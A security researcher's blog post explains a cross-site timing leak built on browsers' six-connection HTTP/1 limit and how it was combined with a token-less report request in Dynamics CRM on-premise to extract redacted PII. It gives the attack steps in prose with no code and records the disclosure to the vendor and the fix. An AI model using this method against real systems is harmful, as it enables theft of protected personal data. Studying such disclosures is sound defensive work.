XSLeaking with my best bud SOP

XSLeaking with my best bud SOP

Introduction

During any bug hunting journey, there's bound to be something special. I dedicate this blog post to the most fun CTF-like challenge I encountered working on the Microsoft Dynamics platform. This blog post will go through my revision of an existing XSSLeak technique, then case study into how it applied on Dynamics CRM on-premise.

Cross-domain leakage using connection limit

Going through the XSLeaks Wiki with a miniature lab with PHP calling sleep to simulate database activity and some JS was really fun. However the Connection Pool section sparked some unusual interest for me, as it is linked to a Chromium issue that was marked won't fix. It even contained a PoC. The exploit hinges on the fact there is a global pool for connection sockets in popular browsers:

  • An user opens a page on an attacker-controlled domain.
  • The attacker issues an ajax request to the victim domain with some control over how the data is loaded.
  • Let's say the limit in the global pool is 256 connections. When the XHR to the victim domain is running, the attacker fetches resources from some other 256 domains that he controls.
  • The attacker observes the timing of the 256th connection. Based on this information, the attacker should be able to deduce whether the XHR to the victim took a long or short time to complete.

This proposition is extremely attractive since other techniques either have been mitigated, or require some special markup/response headers, or can only be used with strict synchronization (ie. data is returned directly in the response instead of in a defered fetch). I fixed up the PoC in the issue and ran it against the miniature lab but did not obtain any meaningful results. Upon closer inspection of the Wiki page, Mozilla has confirmed that they have implemented mitigations on Firefox. Even if everything went as expected though, I wouldn't have personally submitted a report using this technique as the exploit would only work if the victim doesn't do anything (ie. not navigate to another page on a different tab) and watch it run for the whole duration. This situation is one of the very few times that SOP would work to the attacker's benefit.

Searching for information on connection pools in popular browsers yielded very interesting information, however. During the HTTP 1.x era, a technique called Domain Sharding is used to bypass the browser's active connection limit to a single domain. This has become obsolete with HTTP/2, as the new protocol allows multiplexing on a single connection. On Chrome, this limit is 6 connections and can be exploited to leak timing of requests cross-domain.

Cross-domain leakage using HTTP/1 connection limit

In the following setup, the attacker's goal is to determine if the XHR to victim.domain/resource has been completed or not with some knowledge of the time the request will start, in this case at iframe.load which can be captured cross-domain.

Suppose this request takes approximately 1.5 seconds. By tricking the victim into visiting a page he controls, he can determine this by asynchronously requesting a static resource like victim.domain/static.png in blocks of 6. Cache busting elements should be included in the requests to avoid this optimization interfering with measurements. iframe or any other elements that load resources asynchronously like script would work so frame option isn't an issue.

BlockSocket

As the size of static resources does not vary, it is expected that the running time of 6 parallel requests for any would be about the same. This only holds when no other requests are running. In the case where victim.domain/resource is running, the waterfall of requests obtained from the Chrome Devtool would be like the following, supposed that the static resource requests will take approximately 1 second.

BlockWaterfall

We can observe that:

  • The first 5 requests for the static resource victim.domain/static.png go through just fine and take approximately 1 second to complete as expected
  • The 6th request is stalled by approximately 1 second. The browser has to wait for any of the first 5 requests to finish before executing the 6th since the request to the target victim.domain/resource will run for another 0.5 seconds.
  • As the first 5 requests all finish after approximately 1 second, the 6th to 10th requests for victim.domain/static.png all take approximately 2 seconds to finish.
  • At the 1.5 second mark, the target request to victim.domain/resource is finished. This unblocks the 11th request. The total time for the 11th request to complete is 2.5 second from the initial iframe.load event.

Based on these observations, it's possible to conclude that given the target host is running HTTP/1 and the requests to a static resource remain somewhat constant during the attack, an attacker can determine at any single point in time if cross-domain requests are running.

In a real environment, jitter can be a massive problem and create false results. The following is the waterfall of my exploit encountering this phenomenon.

FalseNegative

In this instance, Chrome DevTool indicated that the 6th request in the block experienced a stall, the sign that an XHR is running cross-domain. However, due to the speed of the fetch improving dramatically on this specific request, the total time to completion of the request is approximately that of all 5 previous ones. Without the Timing-Allow-Origin header, there is no way to distinguish the stall time of a request cross-domain, resulting in the attacker drawing the wrong conclusion that there isn't an XHR running on the victim domain.

To safeguard against this, the attacker has to:

  • Decrease sensitivity. The 6th request taking 133% longer than the average of the last 5 proved to be good enough in both the LAN scope and the internet scope (VPN connection from Vietnam to India and back) to conclude that an XHR is running in the background.
  • Perform multiple sanity checks. Multiple tests instances should yield the same results. This consistancy is required before a conclusion can be drawn.

Inception

The aforementioned revision was made around December 2020, when I was combing through the report generation functionalities in Dynamics CRM on-premise when I came across the following POST request that did not include a CSRF token but returned 200 just fine.

CSRFLoadReport

This request simply opens a report with the corresponding id and throws 400 if the user does not view permission. Notice that it also contains a CRM_filter, which means an attacker can force any user to load a report a certain way as long as he knows its id and the user can view it. The attacker can share his report with others in the same tenant so the id parameter wouldn't be an issue. CRM_filter supports a partial match construct (ie. LIKE in SQL) on arbitrary columns in the dataset.

To discuss a little bit about why this works through SameSite at the time, it is because by default Dynamics CRM on-premise is deployed in an Active Directory environment and therefore uses NTLM/Keberos authentication. As this method produces a token attached in the header (Authenticate: NTLM) instead of a cookie, SameSite does not do anything. Also to the attacker's advantage, NTLM authentication is incompatible with HTTP/2 at least on IIS.

As this action is idempotent (loading it more times would not change the report's content), I started thinking about strategies that would let me leak the content. Common sense suggests that it would be too easy if the server allows you to create a report querying data on a table to which you don't have view permission. It did not. I took note, browsed elsewhere, and did not come back until I discovered that Dynamics CRM supports field-level security.

To spare anyone who doesn't want to go through the documentation, an example of this fine grained RBAC being applied would be a situation like this:

  • Alice is a nurse and Chris is a lab tech, they both work at the same clinic
  • Alice handles patients and would need to know their PII to contact them when results are out
  • Chris however has no need for PII and can process tests just fine. Results can be correlated using a GUID primary key.
  • The Admin can therefore restricts Chris's access to fields on the Customer table containing any PII. When Chris queries the table, he will know those fields exist, but information is redacted.
  • As Chris have read access to the table, he can create a report.

I was very excited that there's a security boundary to break. Showing that Chris as an attacker can leak PII when Alice opens his report would make a convincing case. The hurdles were very high though.

Even though Dynamics CRM uses SQL Server Reporting Service (SSRS) under the hood, I cannot pass in a complete report definition .rdl without being an Admin. Normal users instead can only use the Report Wizard, which only accepts a custom sandboxed format. It also validates any permission the user carries so no IDOR shenanigans here. The following request to SuccessFailurePage.aspx will trigger validations before generating a report definition using XSLT.

SuccessFailurePage

Here's the wizardPagePostData parameter in more detail

CustomReport

The part outlined in green contains the metadata of the report. The part outlined in red contains a FetchXML query. This is to prevent against injection as report definitions can contain raw SQL. Further more, as SSRS reports can also contain Javascript, Dynamics CRM only allows the user to modify some css parameter, none of which are useful contained in the part outlined in blue.

To make matters worse, I also discovered going into the fine print was that the CSRF loads the report viewer with the specified filter, but does not fetch any information itself. The data is deferred and fetched later at document.load using an AJAX request to the server, which was protected using a token. Chris, the attacker, needs an oracle to measure the timing of an XHR that cannot be initiated directly cross-domain. The aforementioned revision of the Connection Pool oracle is the result of me trying to find an out to this situation.

Putting it all together

With an oracle, we only need to inflate the timing difference between positive and negative queries. For example in Dynamics CRM, to zero in on the phone number of a single patient that was redacted, we can perform an outer join of the patient's dataset with itself before applying a filter based on the name of the person of interest.

RecursiveJoin

This will create a report with a lot of duplicate data. The point is to return all data when a query returns true and nothing when it returns false. The attacker controls the rendering using the CRM_filter parameter at runtime to avoid having to create many reports.

ExploitReport

In this instance, it takes around 4 seconds to paginate and render 313 pages report versus an empty one in the LAN scope, where Active Diretory is used the most. The exploit path is now clear:

  • Chris creates a special report using the wizard, shares it with Alice, and create another domain with the exploit code.
  • Alice visits said domain and loads an empty report once using an impossible condition (ie. searching for a random string against the name field). This forces all static resources to cache client side
  • Next, sleep briefly after iframe.onload before using this impossible condition to determine a point of time where no XHR is running in the background.
  • Test if this point of time is appropriate by using a strictly true condition (ie. searching for the person of interest's name against the name field. Since all rows have the same data, all data is returned)
  • If a delay is observed on the 6th request, the data XHR is running at this point. Chris now changes the filter to match the phone_number field to exfiltrate data.
  • If no delay is observed, increase the initial delay and try again.

Vendor's response

Microsoft accepted the issue as Information disclosure of Important severity as well as paid out a bounty. No CVE was designated, however. Considering a good ol' reflect XSS could have done way more with way less effort, I found this judgment to be extremely generous on their part. It took a year, but I got paid so kudos to them.

Timeline:

13/01/2021 – Reported the vulnerability to the vendor
13/10/2021 – The vendor accepted the report
14/01/2022 - Vendor announced the issue has been fixed